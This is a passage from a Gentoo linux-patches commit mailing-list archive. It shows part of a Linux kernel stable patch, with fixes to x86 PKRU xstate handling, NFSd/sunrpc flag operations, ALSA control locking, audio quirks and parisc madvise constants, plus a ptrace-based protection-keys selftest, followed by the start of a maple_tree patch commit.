++		struct pkru_state *xpkru;
++
++		xpkru = __raw_xsave_addr(xsave, XFEATURE_PKRU);
++		*pkru = xpkru->pkru;
++	} else {
++		/*
++		 * KVM may pass NULL here to indicate that it does not need
++		 * PKRU updated.
++		 */
++		if (pkru)
++			*pkru = 0;
++	}
++
+ 	/*
+ 	 * The state that came in from userspace was user-state only.
+ 	 * Mask all the user states out of 'xfeatures':
+@@ -1268,9 +1310,9 @@ static int copy_uabi_to_xstate(struct fpstate *fpstate, const void *kbuf,
+  * Convert from a ptrace standard-format kernel buffer to kernel XSAVE[S]
+  * format and copy to the target thread. Used by ptrace and KVM.
+  */
+-int copy_uabi_from_kernel_to_xstate(struct fpstate *fpstate, const void *kbuf)
++int copy_uabi_from_kernel_to_xstate(struct fpstate *fpstate, const void *kbuf, u32 *pkru)
+ {
+-	return copy_uabi_to_xstate(fpstate, kbuf, NULL);
++	return copy_uabi_to_xstate(fpstate, kbuf, NULL, pkru);
+ }
+ 
+ /*
+@@ -1278,10 +1320,10 @@ int copy_uabi_from_kernel_to_xstate(struct fpstate *fpstate, const void *kbuf)
+  * XSAVE[S] format and copy to the target thread. This is called from the
+  * sigreturn() and rt_sigreturn() system calls.
+  */
+-int copy_sigframe_from_user_to_xstate(struct fpstate *fpstate,
++int copy_sigframe_from_user_to_xstate(struct task_struct *tsk,
+ 				      const void __user *ubuf)
+ {
+-	return copy_uabi_to_xstate(fpstate, NULL, ubuf);
++	return copy_uabi_to_xstate(tsk->thread.fpu.fpstate, NULL, ubuf, &tsk->thread.pkru);
+ }
+ 
+ static bool validate_independent_components(u64 mask)
+diff --git a/arch/x86/kernel/fpu/xstate.h b/arch/x86/kernel/fpu/xstate.h
+index 5ad47031383b5..a4ecb04d8d646 100644
+--- a/arch/x86/kernel/fpu/xstate.h
++++ b/arch/x86/kernel/fpu/xstate.h
+@@ -46,8 +46,8 @@ extern void __copy_xstate_to_uabi_buf(struct membuf to, struct fpstate *fpstate,
+ 				      u32 pkru_val, enum xstate_copy_mode copy_mode);
+ extern void copy_xstate_to_uabi_buf(struct membuf to, struct task_struct *tsk,
+ 				    enum xstate_copy_mode mode);
+-extern int copy_uabi_from_kernel_to_xstate(struct fpstate *fpstate, const void *kbuf);
+-extern int copy_sigframe_from_user_to_xstate(struct fpstate *fpstate, const void __user *ubuf);
++extern int copy_uabi_from_kernel_to_xstate(struct fpstate *fpstate, const void *kbuf, u32 *pkru);
++extern int copy_sigframe_from_user_to_xstate(struct task_struct *tsk, const void __user *ubuf);
+ 
+ 
+ extern void fpu__init_cpu_xstate(void);
+diff --git a/fs/nfsd/nfs4proc.c b/fs/nfsd/nfs4proc.c
+index 34d1cd5883fbb..c7329523a10f1 100644
+--- a/fs/nfsd/nfs4proc.c
++++ b/fs/nfsd/nfs4proc.c
+@@ -928,7 +928,7 @@ nfsd4_read(struct svc_rqst *rqstp, struct nfsd4_compound_state *cstate,
+ 	 * the client wants us to do more in this compound:
+ 	 */
+ 	if (!nfsd4_last_compound_op(rqstp))
+-		__clear_bit(RQ_SPLICE_OK, &rqstp->rq_flags);
++		clear_bit(RQ_SPLICE_OK, &rqstp->rq_flags);
+ 
+ 	/* check stateid */
+ 	status = nfs4_preprocess_stateid_op(rqstp, cstate, &cstate->current_fh,
+@@ -2615,12 +2615,11 @@ nfsd4_proc_compound(struct svc_rqst *rqstp)
+ 	cstate->minorversion = args->minorversion;
+ 	fh_init(current_fh, NFS4_FHSIZE);
+ 	fh_init(save_fh, NFS4_FHSIZE);
+-
+ 	/*
+ 	 * Don't use the deferral mechanism for NFSv4; compounds make it
+ 	 * too hard to avoid non-idempotency problems.
+ 	 */
+-	__clear_bit(RQ_USEDEFERRAL, &rqstp->rq_flags);
++	clear_bit(RQ_USEDEFERRAL, &rqstp->rq_flags);
+ 
+ 	/*
+ 	 * According to RFC3010, this takes precedence over all other errors.
+@@ -2742,7 +2741,7 @@ encode_op:
+ out:
+ 	cstate->status = status;
+ 	/* Reset deferral mechanism for RPC deferrals */
+-	__set_bit(RQ_USEDEFERRAL, &rqstp->rq_flags);
++	set_bit(RQ_USEDEFERRAL, &rqstp->rq_flags);
+ 	return rpc_success;
+ }
+ 
+diff --git a/fs/nfsd/nfs4xdr.c b/fs/nfsd/nfs4xdr.c
+index 78849646fe832..8377e14b8fba9 100644
+--- a/fs/nfsd/nfs4xdr.c
++++ b/fs/nfsd/nfs4xdr.c
+@@ -2464,7 +2464,7 @@ nfsd4_decode_compound(struct nfsd4_compoundargs *argp)
+ 	argp->rqstp->rq_cachetype = cachethis ? RC_REPLBUFF : RC_NOCACHE;
+ 
+ 	if (readcount > 1 || max_reply > PAGE_SIZE - auth_slack)
+-		__clear_bit(RQ_SPLICE_OK, &argp->rqstp->rq_flags);
++		clear_bit(RQ_SPLICE_OK, &argp->rqstp->rq_flags);
+ 
+ 	return true;
+ }
+diff --git a/init/Kconfig b/init/Kconfig
+index 94125d3b6893c..0c214af99085d 100644
+--- a/init/Kconfig
++++ b/init/Kconfig
+@@ -892,13 +892,17 @@ config CC_IMPLICIT_FALLTHROUGH
+ 	default "-Wimplicit-fallthrough=5" if CC_IS_GCC && $(cc-option,-Wimplicit-fallthrough=5)
+ 	default "-Wimplicit-fallthrough" if CC_IS_CLANG && $(cc-option,-Wunreachable-code-fallthrough)
+ 
+-# Currently, disable gcc-12 array-bounds globally.
++# Currently, disable gcc-11,12 array-bounds globally.
+ # We may want to target only particular configurations some day.
++config GCC11_NO_ARRAY_BOUNDS
++	def_bool y
++
+ config GCC12_NO_ARRAY_BOUNDS
+ 	def_bool y
+ 
+ config CC_NO_ARRAY_BOUNDS
+ 	bool
++	default y if CC_IS_GCC && GCC_VERSION >= 110000 && GCC_VERSION < 120000 && GCC11_NO_ARRAY_BOUNDS
+ 	default y if CC_IS_GCC && GCC_VERSION >= 120000 && GCC_VERSION < 130000 && GCC12_NO_ARRAY_BOUNDS
+ 
+ #
+diff --git a/net/sched/sch_api.c b/net/sched/sch_api.c
+index 4a27dfb1ba0fa..c82532e206992 100644
+--- a/net/sched/sch_api.c
++++ b/net/sched/sch_api.c
+@@ -1132,6 +1132,11 @@ skip:
+ 			return -ENOENT;
+ 		}
+ 
++		if (new && new->ops == &noqueue_qdisc_ops) {
++			NL_SET_ERR_MSG(extack, "Cannot assign noqueue to a class");
++			return -EINVAL;
++		}
++
+ 		err = cops->graft(parent, cl, new, &old, extack);
+ 		if (err)
+ 			return err;
+diff --git a/net/sunrpc/auth_gss/svcauth_gss.c b/net/sunrpc/auth_gss/svcauth_gss.c
+index 9a5db285d4ae5..bdc34ea0d939d 100644
+--- a/net/sunrpc/auth_gss/svcauth_gss.c
++++ b/net/sunrpc/auth_gss/svcauth_gss.c
+@@ -900,7 +900,7 @@ unwrap_integ_data(struct svc_rqst *rqstp, struct xdr_buf *buf, u32 seq, struct g
+ 	 * rejecting the server-computed MIC in this somewhat rare case,
+ 	 * do not use splice with the GSS integrity service.
+ 	 */
+-	__clear_bit(RQ_SPLICE_OK, &rqstp->rq_flags);
++	clear_bit(RQ_SPLICE_OK, &rqstp->rq_flags);
+ 
+ 	/* Did we already verify the signature on the original pass through? */
+ 	if (rqstp->rq_deferred)
+@@ -972,7 +972,7 @@ unwrap_priv_data(struct svc_rqst *rqstp, struct xdr_buf *buf, u32 seq, struct gs
+ 	int pad, remaining_len, offset;
+ 	u32 rseqno;
+ 
+-	__clear_bit(RQ_SPLICE_OK, &rqstp->rq_flags);
++	clear_bit(RQ_SPLICE_OK, &rqstp->rq_flags);
+ 
+ 	priv_len = svc_getnl(&buf->head[0]);
+ 	if (rqstp->rq_deferred) {
+diff --git a/net/sunrpc/svc.c b/net/sunrpc/svc.c
+index 149171774bc63..24577d1b99079 100644
+--- a/net/sunrpc/svc.c
++++ b/net/sunrpc/svc.c
+@@ -1244,10 +1244,10 @@ svc_process_common(struct svc_rqst *rqstp, struct kvec *argv, struct kvec *resv)
+ 		goto err_short_len;
+ 
+ 	/* Will be turned off by GSS integrity and privacy services */
+-	__set_bit(RQ_SPLICE_OK, &rqstp->rq_flags);
++	set_bit(RQ_SPLICE_OK, &rqstp->rq_flags);
+ 	/* Will be turned off only when NFSv4 Sessions are used */
+-	__set_bit(RQ_USEDEFERRAL, &rqstp->rq_flags);
+-	__clear_bit(RQ_DROPME, &rqstp->rq_flags);
++	set_bit(RQ_USEDEFERRAL, &rqstp->rq_flags);
++	clear_bit(RQ_DROPME, &rqstp->rq_flags);
+ 
+ 	svc_putu32(resv, rqstp->rq_xid);
+ 
+diff --git a/net/sunrpc/svc_xprt.c b/net/sunrpc/svc_xprt.c
+index 2106003645a78..c2ce125380080 100644
+--- a/net/sunrpc/svc_xprt.c
++++ b/net/sunrpc/svc_xprt.c
+@@ -1238,7 +1238,7 @@ static struct cache_deferred_req *svc_defer(struct cache_req *req)
+ 	trace_svc_defer(rqstp);
+ 	svc_xprt_get(rqstp->rq_xprt);
+ 	dr->xprt = rqstp->rq_xprt;
+-	__set_bit(RQ_DROPME, &rqstp->rq_flags);
++	set_bit(RQ_DROPME, &rqstp->rq_flags);
+ 
+ 	dr->handle.revisit = svc_revisit;
+ 	return &dr->handle;
+diff --git a/net/sunrpc/svcsock.c b/net/sunrpc/svcsock.c
+index 2fc98fea59b46..e833103f46291 100644
+--- a/net/sunrpc/svcsock.c
++++ b/net/sunrpc/svcsock.c
+@@ -298,9 +298,9 @@ static void svc_sock_setbufsize(struct svc_sock *svsk, unsigned int nreqs)
+ static void svc_sock_secure_port(struct svc_rqst *rqstp)
+ {
+ 	if (svc_port_is_privileged(svc_addr(rqstp)))
+-		__set_bit(RQ_SECURE, &rqstp->rq_flags);
++		set_bit(RQ_SECURE, &rqstp->rq_flags);
+ 	else
+-		__clear_bit(RQ_SECURE, &rqstp->rq_flags);
++		clear_bit(RQ_SECURE, &rqstp->rq_flags);
+ }
+ 
+ /*
+@@ -1008,9 +1008,9 @@ static int svc_tcp_recvfrom(struct svc_rqst *rqstp)
+ 	rqstp->rq_xprt_ctxt   = NULL;
+ 	rqstp->rq_prot	      = IPPROTO_TCP;
+ 	if (test_bit(XPT_LOCAL, &svsk->sk_xprt.xpt_flags))
+-		__set_bit(RQ_LOCAL, &rqstp->rq_flags);
++		set_bit(RQ_LOCAL, &rqstp->rq_flags);
+ 	else
+-		__clear_bit(RQ_LOCAL, &rqstp->rq_flags);
++		clear_bit(RQ_LOCAL, &rqstp->rq_flags);
+ 
+ 	p = (__be32 *)rqstp->rq_arg.head[0].iov_base;
+ 	calldir = p[1];
+diff --git a/net/sunrpc/xprtrdma/svc_rdma_transport.c b/net/sunrpc/xprtrdma/svc_rdma_transport.c
+index 199fa012f18a8..94b20fb471356 100644
+--- a/net/sunrpc/xprtrdma/svc_rdma_transport.c
++++ b/net/sunrpc/xprtrdma/svc_rdma_transport.c
+@@ -602,7 +602,7 @@ static int svc_rdma_has_wspace(struct svc_xprt *xprt)
+ 
+ static void svc_rdma_secure_port(struct svc_rqst *rqstp)
+ {
+-	__set_bit(RQ_SECURE, &rqstp->rq_flags);
++	set_bit(RQ_SECURE, &rqstp->rq_flags);
+ }
+ 
+ static void svc_rdma_kill_temp_xprt(struct svc_xprt *xprt)
+diff --git a/sound/core/control.c b/sound/core/control.c
+index 50e7ba66f1876..82aa1af1d1d87 100644
+--- a/sound/core/control.c
++++ b/sound/core/control.c
+@@ -1203,14 +1203,19 @@ static int snd_ctl_elem_read(struct snd_card *card,
+ 	const u32 pattern = 0xdeadbeef;
+ 	int ret;
+ 
++	down_read(&card->controls_rwsem);
+ 	kctl = snd_ctl_find_id(card, &control->id);
+-	if (kctl == NULL)
+-		return -ENOENT;
++	if (kctl == NULL) {
++		ret = -ENOENT;
++		goto unlock;
++	}
+ 
+ 	index_offset = snd_ctl_get_ioff(kctl, &control->id);
+ 	vd = &kctl->vd[index_offset];
+-	if (!(vd->access & SNDRV_CTL_ELEM_ACCESS_READ) || kctl->get == NULL)
+-		return -EPERM;
++	if (!(vd->access & SNDRV_CTL_ELEM_ACCESS_READ) || kctl->get == NULL) {
++		ret = -EPERM;
++		goto unlock;
++	}
+ 
+ 	snd_ctl_build_ioff(&control->id, kctl, index_offset);
+ 
+@@ -1220,7 +1225,7 @@ static int snd_ctl_elem_read(struct snd_card *card,
+ 	info.id = control->id;
+ 	ret = __snd_ctl_elem_info(card, kctl, &info, NULL);
+ 	if (ret < 0)
+-		return ret;
++		goto unlock;
+ #endif
+ 
+ 	if (!snd_ctl_skip_validation(&info))
+@@ -1230,7 +1235,7 @@ static int snd_ctl_elem_read(struct snd_card *card,
+ 		ret = kctl->get(kctl, control);
+ 	snd_power_unref(card);
+ 	if (ret < 0)
+-		return ret;
++		goto unlock;
+ 	if (!snd_ctl_skip_validation(&info) &&
+ 	    sanity_check_elem_value(card, control, &info, pattern) < 0) {
+ 		dev_err(card->dev,
+@@ -1238,8 +1243,11 @@ static int snd_ctl_elem_read(struct snd_card *card,
+ 			control->id.iface, control->id.device,
+ 			control->id.subdevice, control->id.name,
+ 			control->id.index);
+-		return -EINVAL;
++		ret = -EINVAL;
++		goto unlock;
+ 	}
++unlock:
++	up_read(&card->controls_rwsem);
+ 	return ret;
+ }
+ 
+@@ -1253,9 +1261,7 @@ static int snd_ctl_elem_read_user(struct snd_card *card,
+ 	if (IS_ERR(control))
+ 		return PTR_ERR(control);
+ 
+-	down_read(&card->controls_rwsem);
+ 	result = snd_ctl_elem_read(card, control);
+-	up_read(&card->controls_rwsem);
+ 	if (result < 0)
+ 		goto error;
+ 
+diff --git a/sound/pci/hda/cs35l41_hda.c b/sound/pci/hda/cs35l41_hda.c
+index e5f0549bf06d0..a5b10a6a33a5e 100644
+--- a/sound/pci/hda/cs35l41_hda.c
++++ b/sound/pci/hda/cs35l41_hda.c
+@@ -598,8 +598,8 @@ static int cs35l41_system_suspend(struct device *dev)
+ 	dev_dbg(cs35l41->dev, "System Suspend\n");
+ 
+ 	if (cs35l41->hw_cfg.bst_type == CS35L41_EXT_BOOST_NO_VSPK_SWITCH) {
+-		dev_err(cs35l41->dev, "System Suspend not supported\n");
+-		return -EINVAL;
++		dev_err_once(cs35l41->dev, "System Suspend not supported\n");
++		return 0; /* don't block the whole system suspend */
+ 	}
+ 
+ 	ret = pm_runtime_force_suspend(dev);
+@@ -624,8 +624,8 @@ static int cs35l41_system_resume(struct device *dev)
+ 	dev_dbg(cs35l41->dev, "System Resume\n");
+ 
+ 	if (cs35l41->hw_cfg.bst_type == CS35L41_EXT_BOOST_NO_VSPK_SWITCH) {
+-		dev_err(cs35l41->dev, "System Resume not supported\n");
+-		return -EINVAL;
++		dev_err_once(cs35l41->dev, "System Resume not supported\n");
++		return 0; /* don't block the whole system resume */
+ 	}
+ 
+ 	if (cs35l41->reset_gpio) {
+@@ -647,6 +647,15 @@ static int cs35l41_system_resume(struct device *dev)
+ 	return ret;
+ }
+ 
++static int cs35l41_runtime_idle(struct device *dev)
++{
++	struct cs35l41_hda *cs35l41 = dev_get_drvdata(dev);
++
++	if (cs35l41->hw_cfg.bst_type == CS35L41_EXT_BOOST_NO_VSPK_SWITCH)
++		return -EBUSY; /* suspend not supported yet on this model */
++	return 0;
++}
++
+ static int cs35l41_runtime_suspend(struct device *dev)
+ {
+ 	struct cs35l41_hda *cs35l41 = dev_get_drvdata(dev);
+@@ -1536,7 +1545,8 @@ void cs35l41_hda_remove(struct device *dev)
+ EXPORT_SYMBOL_NS_GPL(cs35l41_hda_remove, SND_HDA_SCODEC_CS35L41);
+ 
+ const struct dev_pm_ops cs35l41_hda_pm_ops = {
+-	RUNTIME_PM_OPS(cs35l41_runtime_suspend, cs35l41_runtime_resume, NULL)
++	RUNTIME_PM_OPS(cs35l41_runtime_suspend, cs35l41_runtime_resume,
++		       cs35l41_runtime_idle)
+ 	SYSTEM_SLEEP_PM_OPS(cs35l41_system_suspend, cs35l41_system_resume)
+ };
+ EXPORT_SYMBOL_NS_GPL(cs35l41_hda_pm_ops, SND_HDA_SCODEC_CS35L41);
+diff --git a/sound/pci/hda/patch_hdmi.c b/sound/pci/hda/patch_hdmi.c
+index 386dd9d9143f9..9ea633fe93393 100644
+--- a/sound/pci/hda/patch_hdmi.c
++++ b/sound/pci/hda/patch_hdmi.c
+@@ -1981,6 +1981,7 @@ static const struct snd_pci_quirk force_connect_list[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x870f, "HP", 1),
+ 	SND_PCI_QUIRK(0x103c, 0x871a, "HP", 1),
+ 	SND_PCI_QUIRK(0x103c, 0x8711, "HP", 1),
++	SND_PCI_QUIRK(0x103c, 0x8715, "HP", 1),
+ 	SND_PCI_QUIRK(0x1462, 0xec94, "MS-7C94", 1),
+ 	SND_PCI_QUIRK(0x8086, 0x2081, "Intel NUC 10", 1),
+ 	{}
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 3794b522c2222..764eb07bbaff4 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9239,6 +9239,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1028, 0x0b1a, "Dell Precision 5570", ALC289_FIXUP_DUAL_SPK),
+ 	SND_PCI_QUIRK(0x1028, 0x0b37, "Dell Inspiron 16 Plus 7620 2-in-1", ALC295_FIXUP_DELL_INSPIRON_TOP_SPEAKERS),
+ 	SND_PCI_QUIRK(0x1028, 0x0b71, "Dell Inspiron 16 Plus 7620", ALC295_FIXUP_DELL_INSPIRON_TOP_SPEAKERS),
++	SND_PCI_QUIRK(0x1028, 0x0c03, "Dell Precision 5340", ALC269_FIXUP_DELL4_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1028, 0x0c19, "Dell Precision 3340", ALC236_FIXUP_DELL_DUAL_CODECS),
+ 	SND_PCI_QUIRK(0x1028, 0x0c1a, "Dell Precision 3340", ALC236_FIXUP_DELL_DUAL_CODECS),
+ 	SND_PCI_QUIRK(0x1028, 0x0c1b, "Dell Precision 3440", ALC236_FIXUP_DELL_DUAL_CODECS),
+@@ -9406,6 +9407,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8ad2, "HP EliteBook 860 16 inch G9 Notebook PC", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b5d, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b5e, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
++	SND_PCI_QUIRK(0x103c, 0x8bf0, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x1043, 0x103e, "ASUS X540SA", ALC256_FIXUP_ASUS_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x103f, "ASUS TX300", ALC282_FIXUP_ASUS_TX300),
+ 	SND_PCI_QUIRK(0x1043, 0x106d, "Asus K53BE", ALC269_FIXUP_LIMIT_INT_MIC_BOOST),
+diff --git a/tools/arch/parisc/include/uapi/asm/mman.h b/tools/arch/parisc/include/uapi/asm/mman.h
+index 506c06a6536fb..4cc88a642e106 100644
+--- a/tools/arch/parisc/include/uapi/asm/mman.h
++++ b/tools/arch/parisc/include/uapi/asm/mman.h
+@@ -1,20 +1,20 @@
+ /* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */
+ #ifndef TOOLS_ARCH_PARISC_UAPI_ASM_MMAN_FIX_H
+ #define TOOLS_ARCH_PARISC_UAPI_ASM_MMAN_FIX_H
+-#define MADV_DODUMP	70
++#define MADV_DODUMP	17
+ #define MADV_DOFORK	11
+-#define MADV_DONTDUMP   69
++#define MADV_DONTDUMP   16
+ #define MADV_DONTFORK	10
+ #define MADV_DONTNEED   4
+ #define MADV_FREE	8
+-#define MADV_HUGEPAGE	67
+-#define MADV_MERGEABLE   65
+-#define MADV_NOHUGEPAGE	68
++#define MADV_HUGEPAGE	14
++#define MADV_MERGEABLE  12
++#define MADV_NOHUGEPAGE 15
+ #define MADV_NORMAL     0
+ #define MADV_RANDOM     1
+ #define MADV_REMOVE	9
+ #define MADV_SEQUENTIAL 2
+-#define MADV_UNMERGEABLE 66
++#define MADV_UNMERGEABLE 13
+ #define MADV_WILLNEED   3
+ #define MAP_ANONYMOUS	0x10
+ #define MAP_DENYWRITE	0x0800
+diff --git a/tools/perf/bench/bench.h b/tools/perf/bench/bench.h
+index 6cefb4315d75e..a5d49b3b6a098 100644
+--- a/tools/perf/bench/bench.h
++++ b/tools/perf/bench/bench.h
+@@ -10,25 +10,13 @@ extern struct timeval bench__start, bench__end, bench__runtime;
+  * The madvise transparent hugepage constants were added in glibc
+  * 2.13. For compatibility with older versions of glibc, define these
+  * tokens if they are not already defined.
+- *
+- * PA-RISC uses different madvise values from other architectures and
+- * needs to be special-cased.
+  */
+-#ifdef __hppa__
+-# ifndef MADV_HUGEPAGE
+-#  define MADV_HUGEPAGE		67
+-# endif
+-# ifndef MADV_NOHUGEPAGE
+-#  define MADV_NOHUGEPAGE	68
+-# endif
+-#else
+ # ifndef MADV_HUGEPAGE
+ #  define MADV_HUGEPAGE		14
+ # endif
+ # ifndef MADV_NOHUGEPAGE
+ #  define MADV_NOHUGEPAGE	15
+ # endif
+-#endif
+ 
+ int bench_numa(int argc, const char **argv);
+ int bench_sched_messaging(int argc, const char **argv);
+diff --git a/tools/testing/selftests/vm/pkey-x86.h b/tools/testing/selftests/vm/pkey-x86.h
+index b078ce9c6d2a7..72c14cd3ddc74 100644
+--- a/tools/testing/selftests/vm/pkey-x86.h
++++ b/tools/testing/selftests/vm/pkey-x86.h
+@@ -104,6 +104,18 @@ static inline int cpu_has_pkeys(void)
+ 	return 1;
+ }
+ 
++static inline int cpu_max_xsave_size(void)
++{
++	unsigned long XSTATE_CPUID = 0xd;
++	unsigned int eax;
++	unsigned int ebx;
++	unsigned int ecx;
++	unsigned int edx;
++
++	__cpuid_count(XSTATE_CPUID, 0, eax, ebx, ecx, edx);
++	return ecx;
++}
++
+ static inline u32 pkey_bit_position(int pkey)
+ {
+ 	return pkey * PKEY_BITS_PER_PKEY;
+diff --git a/tools/testing/selftests/vm/protection_keys.c b/tools/testing/selftests/vm/protection_keys.c
+index 291bc1e07842d..95f403a0c46df 100644
+--- a/tools/testing/selftests/vm/protection_keys.c
++++ b/tools/testing/selftests/vm/protection_keys.c
+@@ -18,12 +18,13 @@
+  *	do a plain mprotect() to a mprotect_pkey() area and make sure the pkey sticks
+  *
+  * Compile like this:
+- *	gcc      -o protection_keys    -O2 -g -std=gnu99 -pthread -Wall protection_keys.c -lrt -ldl -lm
+- *	gcc -m32 -o protection_keys_32 -O2 -g -std=gnu99 -pthread -Wall protection_keys.c -lrt -ldl -lm
++ *	gcc -mxsave      -o protection_keys    -O2 -g -std=gnu99 -pthread -Wall protection_keys.c -lrt -ldl -lm
++ *	gcc -mxsave -m32 -o protection_keys_32 -O2 -g -std=gnu99 -pthread -Wall protection_keys.c -lrt -ldl -lm
+  */
+ #define _GNU_SOURCE
+ #define __SANE_USERSPACE_TYPES__
+ #include <errno.h>
++#include <linux/elf.h>
+ #include <linux/futex.h>
+ #include <time.h>
+ #include <sys/time.h>
+@@ -1550,6 +1551,129 @@ void test_implicit_mprotect_exec_only_memory(int *ptr, u16 pkey)
+ 	do_not_expect_pkey_fault("plain read on recently PROT_EXEC area");
+ }
+ 
++#if defined(__i386__) || defined(__x86_64__)
++void test_ptrace_modifies_pkru(int *ptr, u16 pkey)
++{
++	u32 new_pkru;
++	pid_t child;
++	int status, ret;
++	int pkey_offset = pkey_reg_xstate_offset();
++	size_t xsave_size = cpu_max_xsave_size();
++	void *xsave;
++	u32 *pkey_register;
++	u64 *xstate_bv;
++	struct iovec iov;
++
++	new_pkru = ~read_pkey_reg();
++	/* Don't make PROT_EXEC mappings inaccessible */
++	new_pkru &= ~3;
++
++	child = fork();
++	pkey_assert(child >= 0);
++	dprintf3("[%d] fork() ret: %d\n", getpid(), child);
++	if (!child) {
++		ptrace(PTRACE_TRACEME, 0, 0, 0);
++		/* Stop and allow the tracer to modify PKRU directly */
++		raise(SIGSTOP);
++
++		/*
++		 * need __read_pkey_reg() version so we do not do shadow_pkey_reg
++		 * checking
++		 */
++		if (__read_pkey_reg() != new_pkru)
++			exit(1);
++
++		/* Stop and allow the tracer to clear XSTATE_BV for PKRU */
++		raise(SIGSTOP);
++
++		if (__read_pkey_reg() != 0)
++			exit(1);
++
++		/* Stop and allow the tracer to examine PKRU */
++		raise(SIGSTOP);
++
++		exit(0);
++	}
++
++	pkey_assert(child == waitpid(child, &status, 0));
++	dprintf3("[%d] waitpid(%d) status: %x\n", getpid(), child, status);
++	pkey_assert(WIFSTOPPED(status) && WSTOPSIG(status) == SIGSTOP);
++
++	xsave = (void *)malloc(xsave_size);
++	pkey_assert(xsave > 0);
++
++	/* Modify the PKRU register directly */
++	iov.iov_base = xsave;
++	iov.iov_len = xsave_size;
++	ret = ptrace(PTRACE_GETREGSET, child, (void *)NT_X86_XSTATE, &iov);
++	pkey_assert(ret == 0);
++
++	pkey_register = (u32 *)(xsave + pkey_offset);
++	pkey_assert(*pkey_register == read_pkey_reg());
++
++	*pkey_register = new_pkru;
++
++	ret = ptrace(PTRACE_SETREGSET, child, (void *)NT_X86_XSTATE, &iov);
++	pkey_assert(ret == 0);
++
++	/* Test that the modification is visible in ptrace before any execution */
++	memset(xsave, 0xCC, xsave_size);
++	ret = ptrace(PTRACE_GETREGSET, child, (void *)NT_X86_XSTATE, &iov);
++	pkey_assert(ret == 0);
++	pkey_assert(*pkey_register == new_pkru);
++
++	/* Execute the tracee */
++	ret = ptrace(PTRACE_CONT, child, 0, 0);
++	pkey_assert(ret == 0);
++
++	/* Test that the tracee saw the PKRU value change */
++	pkey_assert(child == waitpid(child, &status, 0));
++	dprintf3("[%d] waitpid(%d) status: %x\n", getpid(), child, status);
++	pkey_assert(WIFSTOPPED(status) && WSTOPSIG(status) == SIGSTOP);
++
++	/* Test that the modification is visible in ptrace after execution */
++	memset(xsave, 0xCC, xsave_size);
++	ret = ptrace(PTRACE_GETREGSET, child, (void *)NT_X86_XSTATE, &iov);
++	pkey_assert(ret == 0);
++	pkey_assert(*pkey_register == new_pkru);
++
++	/* Clear the PKRU bit from XSTATE_BV */
++	xstate_bv = (u64 *)(xsave + 512);
++	*xstate_bv &= ~(1 << 9);
++
++	ret = ptrace(PTRACE_SETREGSET, child, (void *)NT_X86_XSTATE, &iov);
++	pkey_assert(ret == 0);
++
++	/* Test that the modification is visible in ptrace before any execution */
++	memset(xsave, 0xCC, xsave_size);
++	ret = ptrace(PTRACE_GETREGSET, child, (void *)NT_X86_XSTATE, &iov);
++	pkey_assert(ret == 0);
++	pkey_assert(*pkey_register == 0);
++
++	ret = ptrace(PTRACE_CONT, child, 0, 0);
++	pkey_assert(ret == 0);
++
++	/* Test that the tracee saw the PKRU value go to 0 */
++	pkey_assert(child == waitpid(child, &status, 0));
++	dprintf3("[%d] waitpid(%d) status: %x\n", getpid(), child, status);
++	pkey_assert(WIFSTOPPED(status) && WSTOPSIG(status) == SIGSTOP);
++
++	/* Test that the modification is visible in ptrace after execution */
++	memset(xsave, 0xCC, xsave_size);
++	ret = ptrace(PTRACE_GETREGSET, child, (void *)NT_X86_XSTATE, &iov);
++	pkey_assert(ret == 0);
++	pkey_assert(*pkey_register == 0);
++
++	ret = ptrace(PTRACE_CONT, child, 0, 0);
++	pkey_assert(ret == 0);
++	pkey_assert(child == waitpid(child, &status, 0));
++	dprintf3("[%d] waitpid(%d) status: %x\n", getpid(), child, status);
++	pkey_assert(WIFEXITED(status));
++	pkey_assert(WEXITSTATUS(status) == 0);
++	free(xsave);
++}
++#endif
++
+ void test_mprotect_pkey_on_unsupported_cpu(int *ptr, u16 pkey)
+ {
+ 	int size = PAGE_SIZE;
+@@ -1585,6 +1709,9 @@ void (*pkey_tests[])(int *ptr, u16 pkey) = {
+ 	test_pkey_syscalls_bad_args,
+ 	test_pkey_alloc_exhaust,
+ 	test_pkey_alloc_free_attach_pkey0,
++#if defined(__i386__) || defined(__x86_64__)
++	test_ptrace_modifies_pkru,
++#endif
+ };
+ 
+ void run_tests_once(void)


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-01-12 15:25 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-01-12 15:25 UTC (permalink / raw
  To: gentoo-commits

commit:     cfad7fa18e7a38299e446e09aedf44360ddd829d
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Jan 12 15:25:25 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Jan 12 15:25:25 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=cfad7fa1

maple_tree: fix mas_empty_area_rev() lower bound validation

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                        |  4 ++
 ...ee-fix-mas-empty-area-rev-lower-bound-val.patch | 82 ++++++++++++++++++++++
 2 files changed, 86 insertions(+)

diff --git a/0000_README b/0000_README
index e8c453f1..f47a205a 100644
--- a/0000_README
+++ b/0000_README
@@ -75,6 +75,10 @@ Patch:  1700_sparc-address-warray-bound-warnings.patch
 From:		https://github.com/KSPP/linux/issues/109
 Desc:		Address -Warray-bounds warnings 
 
+Patch:  1800_maple-tree-fix-mas-empty-area-rev-lower-bound-val.patch
